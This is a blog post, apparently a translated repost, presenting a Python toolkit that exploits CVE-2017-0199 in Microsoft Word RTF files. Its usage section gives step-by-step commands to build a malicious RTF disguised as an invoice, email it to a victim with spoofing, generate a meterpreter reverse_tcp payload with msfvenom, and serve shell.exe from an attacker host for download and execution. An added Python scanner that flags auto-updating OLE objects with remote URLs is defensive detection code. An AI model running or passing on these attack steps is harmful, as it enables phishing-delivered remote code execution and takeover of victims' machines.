Generating a CVE-2017-0199 Test File Directly with Python
Author: admin | Date: 2017-4-29 14:35:54 | Category: Hacking tools
Project URL
https://github.com/bhdresh/CVE-2017-0199
CVE-2017-0199 – v2.0 is a convenient Python script for testing CVE-2017-0199; it provides a quick and effective way to exploit the Microsoft RTF RCE. It generates a malicious RTF file and delivers a metasploit/meterpreter payload to the victim without any complicated configuration.
Version: Python 2.7.13
The toolkit provides the following features:
- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
- Automatically send generated malicious RTF to victim using email spoofing
Video tutorial
Usage (example):
Step 1: Generate the malicious RTF file with the following command and send it to the victim
Syntax:  # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example: # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

Step 2 (optional, only if using an MSF payload): Generate the metasploit payload and start a listener
Generate Payload: # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:    # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

Step 3: Start the toolkit in exploitation mode (-M exp) to serve the payload
Syntax:  # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example: # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Command-line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

Modes:
  -M gen                               Generate Malicious RTF file only

  Generate malicious RTF file:
    -w <Filename.rtf>                  Name of malicious RTF file (Share this file with victim).
    -u <http://attacker.com/test.hta>  The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.)

  -M exp                               Start exploitation mode

  Exploitation:
    -p <TCP port:Default 80>           Local port number.
    -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
    -l </tmp/shell.exe>                Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
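For the defensive side of what the help text above describes (an RTF whose embedded object fetches a remote URL as soon as the victim opens the file), here is an added example that is not part of this post or of the bhdresh toolkit. It scans an RTF document for two indicators: the \objautlink and \objupdate control words, which tell Word to refresh a linked OLE object when the document loads, and a URL hidden inside the hex-encoded \objdata stream. The control-word list is my assumption about what such samples share, and the sample RTF, the loopback URL and the function names are constructed here for illustration; treat the result as a triage heuristic, not a signature.

```python
import re
import binascii
from typing import Dict, List, Set

# Control words that mark an OLE object whose remote link is refreshed when
# the document loads. Assumption: these are the indicators that public
# CVE-2017-0199 samples share; tune the list against your own sample set.
SUSPICIOUS_CONTROL_WORDS = (b"\\objautlink", b"\\objupdate")

# Printable-ASCII URL; it stops at whitespace or NUL, so UTF-16 padding ends it.
URL_RE = re.compile(rb"https?://[\x21-\x7e]+", re.IGNORECASE)

# Hex stream that follows an \objdata destination, e.g. {\*\objdata 0105...}
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objdata_blobs(rtf: bytes) -> List[bytes]:
    """Decode every \\objdata hex stream in the document into raw bytes."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", match.group(1))
        if len(hexstr) % 2:          # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        blobs.append(binascii.unhexlify(hexstr))
    return blobs


def find_urls(blob: bytes) -> Set[str]:
    """Return URLs stored either as plain ASCII or as UTF-16LE in an OLE blob."""
    found = set()
    for m in URL_RE.finditer(blob):
        found.add(m.group(0).decode("ascii", "replace"))
    # UTF-16LE strings only decode cleanly from the right byte alignment,
    # so try both offsets; non-ASCII characters are dropped before matching.
    for start in (0, 1):
        narrowed = blob[start:].decode("utf-16-le", "ignore").encode("ascii", "ignore")
        for m in URL_RE.finditer(narrowed):
            found.add(m.group(0).decode("ascii"))
    return found


def scan_rtf(rtf: bytes) -> Dict[str, object]:
    """Flag an RTF that combines auto-updating object control words with a
    remote URL inside its object data."""
    words = [w.decode() for w in SUSPICIOUS_CONTROL_WORDS if w in rtf]
    urls = set()
    for blob in extract_objdata_blobs(rtf):
        urls |= find_urls(blob)
    return {
        "control_words": words,
        "remote_urls": sorted(urls),
        "suspicious": bool(words) and bool(urls),
    }


# Constructed sample: a minimal RTF wrapping an OLE object whose data carries
# a UTF-16LE URL (a loopback address stands in for any real host).
_LINK = b"\x01\x05\x00\x00" + "http://127.0.0.1/logo.doc".encode("utf-16-le")
SAMPLE_MALICIOUS_RTF = (
    b"{\\rtf1\\ansi\n"
    b"{\\object\\objautlink\\objupdate\\objw1\\objh1\n"
    b"{\\*\\objdata " + binascii.hexlify(_LINK) + b"}\n"
    b"}}"
)
# Constructed benign document with no embedded object at all.
SAMPLE_BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for name, doc in (("malicious", SAMPLE_MALICIOUS_RTF), ("benign", SAMPLE_BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

Run it on a directory of inbound attachments and alert on `suspicious`; the extracted `remote_urls` are the values worth blocking at the proxy and hunting for in web logs, since the page notes that the URL is requested the moment the document is opened.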
Disclaimer
This program is intended for educational purposes only. Do not use it without permission. The usual disclaimers apply; in particular, no liability is accepted for consequences caused by direct or indirect use of the functionality these programs provide.